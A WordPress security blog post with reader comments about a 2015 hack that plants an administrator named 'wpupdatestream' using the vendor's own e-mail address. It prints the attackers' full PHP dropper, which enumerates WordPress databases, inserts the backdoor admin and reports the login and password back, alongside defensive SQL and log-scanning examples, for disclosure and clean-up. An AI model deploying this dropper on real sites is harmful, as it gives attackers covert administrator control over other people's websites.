Was Your WordPress Website Hacked by WP White Security?

Last updated on August 31st, 2015 by Robert Abela. Filed under WordPress Security News

Many people whose WordPress website or blog was hacked noticed a new WordPress user with the e-mail address support@wpwhitesecurity.com (login wpupdatestream, display name Temp User, nicename tempuser) and automatically assumed it was us.

In fact, lately we have been receiving a lot of emails from WordPress administrators asking us whether we hacked their website. I do not blame them, especially if they do not know about us, but first of all, please note that we do not engage in that type of activity. We promote WordPress security and raise awareness about it, as you can see from our WordPress security blog.

Deciphering the WordPress Hack Attack

Unfortunately we do not have much information about this type of WordPress hack attack. We have been in touch with several independent WordPress security professionals and with Sucuri, and all of us are sharing as much information as we can about this attack, but so far there is not much to go on.

Creating a WordPress Administrator with WP White Security Email Address

The only thing we know so far is that the attackers manage to upload the script below to the web server. When executed, it connects to the database with the host, user name and password supplied in the request (so by the time it runs the attackers already hold the credentials from wp-config.php, or obtained them some other way), looks for every WordPress installation that database user can see, and inserts a user with login wpupdatestream (nicename tempuser, display name Temp User, fixed ID 9192191) together with the two usermeta rows that give it the administrator role. It then reports the site URL, the login and the password p123123 back to its operator. Once the user exists the attackers can log in to WordPress as an administrator and tamper with the website or inject it with malware. Note that the script is not limited to one site: it plants the user in every database the supplied credentials can reach, which is why the same account can show up on several sites that share a database user.

<?php
error_reporting(0);   // suppress all PHP errors so nothing is logged or displayed

// Liveness probe: a GET request with ?check makes the dropper answer "pawet",
// so the operator can confirm the file is in place and executing
if(isset($_GET['check']))
{
    echo "pawet";
}

// Main payload: the operator POSTs the database host (v1), user (v2) and password (v3)
if(isset($_POST["v1"]))
{
    $link = mysql_connect($_POST["v1"], $_POST["v2"], $_POST["v3"]);

    // Enumerate every table the credentials can see, across all databases on the server
    $query = "SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema NOT IN ( 'information_schema', 'performance_schema', 'mysql' )";
    $result = mysql_query($query);
    $tables_list = array();
    while ($line = mysql_fetch_array($result))
    {
        // Any *_options table that has a siteurl row is treated as a WordPress install
        if (strpos($line["table_name"],'_options') !== false) {
            $b = $line["table_schema"].".".$line["table_name"];
            $query2 = "select concat(option_value,'|%5%5%5') from ".$b." where option_name='siteurl'";
            $result2 = mysql_query($query2);
            $row = mysql_fetch_row($result2);
            if (strpos($row[0],'|%5%5%5') !== false) {
                $p = explode("|", $row[0]);
                $site_name = $p[0];                 // site URL, reported back to the operator later
                $p = explode("_", $line["table_name"]);
                $table_p = $p[0]."_";               // table prefix = text before the first underscore
                $db = $line["table_schema"];
                array_push($tables_list,$b."<|>".$site_name."<|>".$table_p."<|>".$db);
            }
        }
    }

    // Plant the administrator account in every WordPress database that was found
    foreach($tables_list as $aaa)
    {
        $list = explode("<|>", $aaa);
        $table_pref = $list[2];
        $site_name = $list[1];
        $db = $list[3];
        mysql_select_db($db);

        // Fixed ID 9192191, login wpupdatestream, nicename tempuser, our support address as e-mail;
        // the base64 blob decodes to a phpass ($P$B...) password hash. user_registered is not set,
        // so it keeps the table default.
        $query = "INSERT INTO `".$table_pref."users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_status`, `display_name`) VALUES ('9192191', 'wpupdatestream', '".base64_decode("JFAkQk5yZmE4eE1Memp0TVhFQjNaeC9IcnhjQXlmV21tLw==")."', 'tempuser', 'support@wpwhitesecurity.com', '0', 'Temp User')";
        mysql_query($query);

        // Serialized capabilities array: administrator plus WPML and BackWPup capabilities,
        // evidently copied from a real administrator's row on a site that had those plugins
        $query = "INSERT INTO `".$table_pref."usermeta` (`umeta_id`,`user_id`,`meta_key`,`meta_value`) VALUES ('9192192', '9192191', '".$table_pref."capabilities', 'a:18:{s:13:\"administrator\";s:1:\"1\";s:34:\"wpml_manage_translation_management\";b:1;s:21:\"wpml_manage_languages\";b:1;s:41:\"wpml_manage_theme_and_plugin_localization\";b:1;s:19:\"wpml_manage_support\";b:1;s:29:\"wpml_manage_media_translation\";b:1;s:22:\"wpml_manage_navigation\";b:1;s:24:\"wpml_manage_sticky_links\";b:1;s:30:\"wpml_manage_string_translation\";b:1;s:33:\"wpml_manage_translation_analytics\";b:1;s:25:\"wpml_manage_wp_menus_sync\";b:1;s:32:\"wpml_manage_taxonomy_translation\";b:1;s:27:\"wpml_manage_troubleshooting\";b:1;s:31:\"wpml_manage_translation_options\";b:1;s:36:\"wpml_manage_woocommerce_multilingual\";b:1;s:37:\"wpml_operate_woocommerce_multilingual\";b:1;s:9:\"translate\";b:1;s:14:\"backwpup_admin\";b:1;}')";
        mysql_query($query);

        // Legacy user_level 10 = administrator
        $query = "INSERT INTO `".$table_pref."usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES ('9192191', '9192191', '".$table_pref."user_level', '10')";
        mysql_query($query);

        // Confirm the row exists, then report site URL, login and password to the operator
        $query3 = "select user_login from `".$table_pref."users` where ID=9192191";
        $result3 = mysql_query($query3);
        $line3 = mysql_fetch_row($result3);
        if($line3[0] == 'wpupdatestream')
        {
            echo $site_name."<|>wpupdatestream<|>p123123|new|";
        }
    }
    mysql_close($link);
}
?>
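The database-side checks a practitioner would run to confirm the indicators above, as an added example that is not part of the original post and not WP White Security's code. It runs against an in-memory SQLite stand-in for wp_users and wp_usermeta filled with constructed rows; the indicator values (ID, login, e-mail, umeta_id values, decoded hash) are taken from the script, while the table prefix and the sample accounts are assumptions. The same SQL works on MySQL through phpMyAdmin or the mysql client. It also goes one step beyond the fixed indicators: the last two functions list every account that holds the administrator capability or user_level 10, so a renamed variant of the same backdoor still shows up.

```python
"""Sweep a WordPress database for the administrator planted by the dropper above.

Added example; uses SQLite so it runs offline. The dropper inserts its rows into
every WordPress schema the supplied credentials can reach, so on a shared host
repeat the sweep for every database, not only the site that reported the user.
"""
import sqlite3

# Indicators hard-coded in the dropper
IOC_USER_ID = 9192191
IOC_LOGIN = "wpupdatestream"
IOC_EMAIL = "support@wpwhitesecurity.com"
IOC_UMETA_IDS = (9192191, 9192192)                      # fixed umeta_id values of its two usermeta rows
IOC_PASS_HASH = "$P$BNrfa8xMLzjtMXEB3Zx/HrxcAyfWmm/"   # what the base64 blob in the script decodes to


def build_sample_db(prefix="wp_"):
    """Constructed sample data: a legitimate admin, an editor, and the planted row.

    The dropper's INSERT omits user_registered, so on a real table that column keeps
    the WordPress default '0000-00-00 00:00:00', a useful secondary tell.
    """
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE `{prefix}users` (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT,
            user_nicename TEXT, user_email TEXT, user_registered TEXT, display_name TEXT);
        CREATE TABLE `{prefix}usermeta` (umeta_id INTEGER PRIMARY KEY, user_id INTEGER,
            meta_key TEXT, meta_value TEXT);
    """)
    conn.executemany(f"INSERT INTO `{prefix}users` VALUES (?,?,?,?,?,?,?)", [
        (1, "alice", "$P$Bexamplehash", "alice", "alice@example.org", "2014-03-01 10:00:00", "Alice"),
        (2, "bob", "$P$Bexamplehash", "bob", "bob@example.org", "2015-01-12 09:30:00", "Bob"),
        (IOC_USER_ID, IOC_LOGIN, IOC_PASS_HASH, "tempuser", IOC_EMAIL, "0000-00-00 00:00:00", "Temp User"),
    ])
    conn.executemany(f"INSERT INTO `{prefix}usermeta` VALUES (?,?,?,?)", [
        (10, 1, prefix + "capabilities", 'a:1:{s:13:"administrator";b:1;}'),
        (11, 1, prefix + "user_level", "10"),
        (12, 2, prefix + "capabilities", 'a:1:{s:6:"editor";b:1;}'),
        (13, 2, prefix + "user_level", "7"),
        # the dropper's two rows (capabilities array shortened here; the real one has 18 entries)
        (9192192, IOC_USER_ID, prefix + "capabilities", 'a:2:{s:13:"administrator";s:1:"1";s:14:"backwpup_admin";b:1;}'),
        (9192191, IOC_USER_ID, prefix + "user_level", "10"),
    ])
    conn.commit()
    return conn


def find_ioc_user(conn, prefix="wp_"):
    """Exact match on the values the dropper hard-codes. Returns (ID, login, email) rows."""
    sql = f"SELECT ID, user_login, user_email FROM `{prefix}users` WHERE ID = ? OR user_login = ? OR user_email = ?"
    return conn.execute(sql, (IOC_USER_ID, IOC_LOGIN, IOC_EMAIL)).fetchall()


def find_ioc_usermeta(conn, prefix="wp_"):
    """The capabilities / user_level rows the dropper inserts, by user_id or by its fixed umeta_ids."""
    sql = f"SELECT umeta_id, user_id, meta_key FROM `{prefix}usermeta` WHERE user_id = ? OR umeta_id IN (?, ?)"
    return conn.execute(sql, (IOC_USER_ID,) + IOC_UMETA_IDS).fetchall()


def list_administrators(conn, prefix="wp_"):
    """Every account with the administrator capability or legacy user_level 10, whatever its name."""
    sql = f"""
        SELECT DISTINCT u.ID, u.user_login, u.user_email, u.user_registered
        FROM `{prefix}users` AS u
        JOIN `{prefix}usermeta` AS m ON m.user_id = u.ID
        WHERE (m.meta_key = ? AND m.meta_value LIKE '%"administrator"%')
           OR (m.meta_key = ? AND m.meta_value = '10')
        ORDER BY u.ID
    """
    return conn.execute(sql, (prefix + "capabilities", prefix + "user_level")).fetchall()


def unexpected_admins(conn, known_logins, prefix="wp_"):
    """Administrators whose login is not on the site owner's list of legitimate admins."""
    return [row for row in list_administrators(conn, prefix) if row[1] not in known_logins]


if __name__ == "__main__":
    db = build_sample_db()
    print("IOC user rows:     ", find_ioc_user(db))
    print("IOC usermeta rows: ", find_ioc_usermeta(db))
    print("unexpected admins: ", unexpected_admins(db, {"alice"}))
```

Deleting the three rows removes the account but not the dropper or the entry point; since the script needs the database password to do its work, change that password (and update wp-config.php) as part of the clean-up.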

Why Is the WP White Security Email Address Used?

Good question. Most probably the author of this script copied the SQL from our article How to Manually Add a WordPress Administrator to the Database using SQL Queries and kept the sample e-mail address we used in that example.

How Can WordPress Attackers Upload Such a Script?

So far we do not have much information, but it could be many things. They could upload such a file after gaining FTP access through a weak password, through an exploit in some service running on the server, or after gaining a foothold through outdated software: an old version of WordPress, a vulnerable plugin or a vulnerable theme. For example, by exploiting the widely abused vulnerability in the RevSlider plugin discovered a few months back, attackers can write files to the web server. Whatever the entry point, the script also needs the database credentials, which in practice means wp-config.php has been read as well. The options are endless, which is why you should at least always use strong passwords and keep all the software you use up to date.

Monitor WordPress To Catch Hackers Red Handed

The above hack is a perfect example of why you should monitor all the activity on your WordPress website and on the web server as well. Always make sure that all the software you run on your web server has logging enabled. If you keep the logs of your web server software and run a WordPress monitoring solution such as the WP Security Audit Log plugin, you have a complete monitoring solution that lets you spot suspicious behaviour (a new administrator account, a PHP file appearing in wp-includes or in the uploads directory, requests to a file you never installed) before it becomes a security issue. And if your WordPress website has already been hacked, the logs also help you trace back how the attack happened and address the security flaw.
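What that monitoring looks like in practice, as an added example that is not part of the original post and not WP White Security's code: a sweep over web-server access logs for the dropper's traffic pattern (PHP executed from a data directory, the ?check liveness probe, POSTs to files that are not standard WordPress endpoints) and over PHP files for strings lifted from the script. The log lines and file contents are constructed; the file names t44.php and new_up.php are the ones readers reported in the comments, and the list of directories where PHP should never execute and of standard POST endpoints are assumptions about a stock WordPress layout that you should adjust for your plugins.

```python
"""Sweep access logs and PHP files for the wpupdatestream dropper.

Added example; all sample data below is constructed for illustration.
"""
import os
import re
from collections import namedtuple

# Apache/nginx "combined" format: ip ident user [ts] "METHOD url proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Directories that hold data and library code; a request that executes PHP there is a red flag (assumption)
NO_PHP_DIRS = ("/wp-content/uploads/", "/wp-includes/")

# Files a stock install legitimately receives POSTs on (assumption; extend for your plugins)
KNOWN_POST_TARGETS = {"/wp-login.php", "/wp-comments-post.php", "/xmlrpc.php", "/wp-cron.php", "/index.php"}

# Strings that occur in the dropper script
FILE_SIGNATURES = (
    'echo "pawet"',
    'mysql_connect($_POST["v1"]',
    "JFAkQk5yZmE4eE1Memp0TVhFQjNaeC9IcnhjQXlmV21tLw==",
    "wpupdatestream",
    "support@wpwhitesecurity.com",
)

Hit = namedtuple("Hit", "reason ip method url")


def scan_access_log(lines):
    """Return one Hit per suspicious aspect of each request (one line can yield several)."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, url = m["ip"], m["method"], m["url"]
        path, _, query = url.partition("?")
        if not path.endswith(".php"):
            continue
        params = {kv.partition("=")[0] for kv in query.split("&") if kv}
        if any(d in path for d in NO_PHP_DIRS):
            hits.append(Hit("php executed from a data/library directory", ip, method, url))
        if method == "GET" and "check" in params:
            # the dropper answers ?check with the 5-byte body "pawet"
            hits.append(Hit("dropper liveness probe (?check)", ip, method, url))
        if method == "POST" and path not in KNOWN_POST_TARGETS and not path.startswith("/wp-admin/"):
            hits.append(Hit("POST to a non-standard php file", ip, method, url))
    return hits


def scan_file_text(text):
    """Signatures from the dropper found in one file's contents (empty tuple if clean)."""
    return tuple(sig for sig in FILE_SIGNATURES if sig in text)


def sweep_files(files):
    """files: iterable of (path, contents). Returns {path: matched signatures} for infected files."""
    found = {}
    for path, text in files:
        sigs = scan_file_text(text)
        if sigs:
            found[path] = sigs
    return found


def sweep_directory(root):
    """Walk a real document root and run sweep_files over every .php/.phtml file in it."""
    def php_files():
        for dirpath, _, names in os.walk(root):
            for name in names:
                if name.endswith((".php", ".phtml")):
                    full = os.path.join(dirpath, name)
                    with open(full, "r", errors="replace") as fh:
                        yield full, fh.read()
    return sweep_files(php_files())


# Constructed sample data: one operator IP probing and using the dropper, one ordinary visitor
SAMPLE_LOG = """\
203.0.113.7 - - [19/Sep/2015:03:14:07 +0000] "GET /wp-includes/t44.php?check HTTP/1.1" 200 5 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Sep/2015:03:14:09 +0000] "POST /wp-includes/t44.php HTTP/1.1" 200 61 "-" "Mozilla/5.0"
198.51.100.4 - - [19/Sep/2015:08:02:41 +0000] "GET /wp-includes/js/colorpicker.js HTTP/1.1" 200 9117 "-" "Mozilla/5.0"
198.51.100.4 - - [19/Sep/2015:08:02:55 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Sep/2015:03:15:30 +0000] "POST /wp-content/uploads/2015/09/new_up.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
"""

SAMPLE_FILES = [
    ("wp-includes/t44.php",
     '<?php error_reporting(0); if(isset($_GET[\'check\'])) { echo "pawet"; } '
     '$h = base64_decode("JFAkQk5yZmE4eE1Memp0TVhFQjNaeC9IcnhjQXlmV21tLw==");'),
    ("wp-includes/version.php", "<?php\n$wp_version = '4.3';\n"),
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG.splitlines()):
        print(hit)
    print(sweep_files(SAMPLE_FILES))
```

Run sweep_directory against the document root of every site on the host, not just the one that noticed the user, and pivot on the source IP of any ?check probe to find the first request that dropped the file; that request is the entry point this post could not identify.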

In the meantime, if you have any more information about this attack please let us know by leaving a comment below or dropping us an email at support@wpwhitesecurity.com.


36 comments

Keely 09/09/2015

Hi guys,

This exact hack has happened to me, so thanks for the info!

Same user, and same email address. Wish I knew what the vulnerability is …

Robert Abela 10/09/2015

Hello Keely,

You’re welcome. Should you have any further information about the attack or need help from our end do not hesitate to get in touch.

Hey guys –

Somebody noticed we had a user on our site:

wpudatestream

with that email you show above. I checked on it, and it had admin privileges, so I changed it to have “NO ROLE” on our site currently while I followed up with y’all to see if this is still a hack?

Thanks!

Robert Abela 19/09/2015

Hello Scott,

Yes it is still a hack. You should try to dig deeper and see from where the user was generated. If you want further help with the forensics, please get in touch. We’d like to see what happened exactly and help you solve your issue.

Tammi 11/10/2015

How did you change them to no role? I have to do everything through my cPanel because I can't access my website.

Robert Abela 15/10/2015

There is “no role” in WordPress. The best thing is to delete the user. I would recommend you to delete the user from the dashboard, hence think first about gaining access back to the website. You can reset the administrator’s password via PHPMyAdmin or by using FTP.

David 19/09/2015

I had the same thing happen to me

Curious what the vulnerability is/was – my site is still not back to normal

Robert Abela 19/09/2015

Hello David, you have to remove the infection for your site to return to normal. Considering the attacker was able to execute a PHP script with malicious code, it could be a remote code execution; else, if they managed to upload files, they could have gained access to your site’s files via other vulnerabilities in other network services, so it is better to audit the whole server.

Keely 21/09/2015

Hi David,

I had to upload a fresh copy of the wp-includes folder, and some of my themes’ files were hacked, so uploaded fresh copies of those.

Install a security plugin such as iThemes Security – https://wordpress.org/plugins/better-wp-security/ – which can prevent uploads/changes to folders. And let you know when suspicious activity is going on.

Let me know if you need any help 🙂

Robert Abela 23/09/2015

Hello Keely,

Did you find the source of the problem though? I.e. just restoring a backup will only remove the infection but does not close the security flaw which was exploited, so the chances of getting hacked again are very high.

Jeffrey 22/09/2015

Me too.. Cleaning this up right now actually.. I did a search for “my site was hacked by support@wpwhitesecurity.com” and found this post.

Is there anything from these files that i’m deleting that could help you track this f#@&er down?

*Also, as a side note, the CTA just below this form leads to a page not found (WSAL Notification Extension).

Robert Abela 23/09/2015

Hello Jeffrey,

Well, so far what we have in this post is all the information we have. So before deleting anything which you think might have been tampered with during the attack, or any logs or anything else, it would be great if you could forward them to us first.

* Thanks for the CTA. Fixed.

becky 30/09/2015

I’m trying to clean up after the same attack. All of the js files had some script inserted into them. I have the bad code if you’re interested.

Robert Abela 08/10/2015

Hello Becky,

Yes please. Send it to me on robert@wpwhitesecurity.com. Thank you.

David 30/09/2015

I have the same issue with my website. It was brought to my attention when Google notified me stating my site is suspected to contain malware and slapped a warning on my site, stopping people from viewing it. I have uploaded a previous backup but suspect the hack may have happened prior to my backup. A little stuck with what to do next??? Any ideas?
Regards
David

Robert Abela 08/10/2015

Hello David,

Just send us an email on support@wpwhitesecurity.com and we will help you get sorted. Looking forward to hearing from you.

Tammi 11/10/2015

I also just got hacked by the same. I have done nothing to remove him, I don't know where to start or if you could use any information.

Robert Abela 15/10/2015

Hello Tammi,

What we have reported here is the “end result of a hack” i.e. what the hacker is doing to keep control of a WordPress website after exploiting the vulnerability. Which vulnerability did he exploit? It could be many so in your case you have to do a proper audit and find out. We can help you with that as well so feel free to get in touch.

We found the same user wpupdatestream and an image file pic.jpg. Inside that image file I found a JSON script with a base64 decoded string. I guess the hacker is playing from both sides (in and out).

What I did is, I searched for pic.jpg from the cPanel file manager and deleted everything, plus I deleted that user wpupdatestream (id=9192191) from the WordPress DB. Looks like it is clean now but we are not sure.

I just wanted to share with you.

Thanks
Janaki

Robert Abela 15/10/2015

Hello Janaki,

Thank you very much for sharing. The problem in these cases is that you cleaned the damage / changes that the hacker did but you did not close the vulnerability he / she exploited. This article explains the “side effects” of a hack, i.e. what the hacker did after exploiting a vulnerability. So in your case I would recommend you to do a proper audit and find out what happened. For future reference, you should keep an audit trail of what is happening on your WordPress. It will definitely be handy.

Rob 27/10/2015

Hi,

I found a user a few weeks ago named “wpupdatestream” (email: support@wpwhitesecurity.com) in our user section. I couldn’t figure it out, but we had had a few other people working on the site recently and I figured one of them must have been doing something, so I simply deleted the user & all its content.

The other day, I logged in and the same user was back! I followed the instructions on this website:
http://odishajobseekers.com/did-you-see-wpupdatestream-user-in-your-wp_users-table/

So, I deleted the user AND the file “t44.php” from the wp-includes folder, which is the php file that contained the exact code you cited at the top of this post.

I’ve also reset our cPanel and FTP passwords & forced a reset for all our WP users.

So far, the user has not returned! Just wanted to let you know about that t44.php file.

WP White Security 09/11/2015

Thanks Rob. Yes the problem though remains; how did the attacker gain access to create the file t44.php? Ideally we should find the source of the problem.

magnus 10/02/2016

Did you find the source?
I want to know if some plugin or else was the way in?

Robert Abela 23/02/2016

Unfortunately we did not manage to gather much evidence so far. Should you have any information, please feel free to share it with us by sending us an email on support@wpwhitesecurity.com

A.Annon 22/02/2016

I have a server running many websites that are inundated with this problem.
I suspect it is due to a plugin named “Gravity Forms”

Robert Abela 23/02/2016

Thanks for sharing the information. If you have any logs or payload that you can share with us, please send it via email on robert@wpwhitesecurity.com

I don't think it's Gravity Forms… I never used it, yet I've been hacked 🙁

Robert Abela 22/03/2016

Hello Karolina,

You don’t have to have gravity forms to be hacked. Please send us an email on support@wpwhitesecurity.com if you need any help from our end.

Oh, just got hacked by “you” guys… I had a user “support@wpwhitesecurity.com” and got blacklisted… As I am in the process of changing hosting it is quite annoying… as whatever they have inserted spread over other sites on the hosting… I am in deep poo I'd say ;/

Neil Gee 25/02/2016

I just had this too and saw the user:
9192191 wpupdatestream support@wpwhitesecurity.com

I currently have a Google slap on my site.

Every single JS file had appended malware on it as described here:
https://blog.sucuri.net/2016/02/massive-admedia-iframe-javascript-infection.html

My host also found a few infections:
/home/wpbeaches/public_html/wp-content/uploads/gravity_forms/123-08f553b398a4b4c85cb1b2e1d4c3ce1b/tmp/_input__test.php..4ee4d9.bak
/home/wpbeaches/public_html/wp-content/uploads/gravity_forms/2-d79068d65f2d7213620970702262b9de/tmp/_input_5_wow.phtml.ad11fa.bak

Most notably Gravity forms.

I asked for a review from Google but it failed – still working through the mire

George P. 02/03/2016

I also had this problem.
I checked my Uploads folder and found a php script inside a subfolder called: new_up.php
that had this script inside: http://pastebin.com/BvybRVSb

I removed the user from the database and restored 3 .js files that the hacker changed.
They were:

wp-admin/js/inline-edit-tax.js
wp-includes/js/colorpicker.js
wp-includes/js/imgareaselect/jquery.imgareaselect.js

Robert Abela 22/03/2016

Thanks for the feedback George. Would it be possible to send me a copy of the infected WordPress files to support@wpwhitesecurity.com?

beamkiller 08/03/2016

This happened to me today too.

Our site was hacked with this user, and a post was created.

Also created 5-6 .php files in plugins and uploads folder. Even changed the index.php file.

Robert Abela 22/03/2016

Hello Beamkiller,

Would it be possible to send us a copy of the infected index.php and the 5-6 .php files? Rename their extension to .txt please so they are not blocked. Please send them to support@wpwhitesecurity.com and thank you in advance.

Aykan Burçak 24/03/2016

Hello,
My website is also hacked and I saw the same user on my user list. I have some doubts about Ajax Comment Posting plugin. Are there anyone using this plugin?
Thanks…

Robert Abela 25/03/2016

Hi Aykan,

Please note that what you’re seeing is the post exploitation result. If the plugin is not vulnerable as such, then that is not the issue. Can you send us a copy of the infected files to support@wpwhitesecurity.com? Thank you.
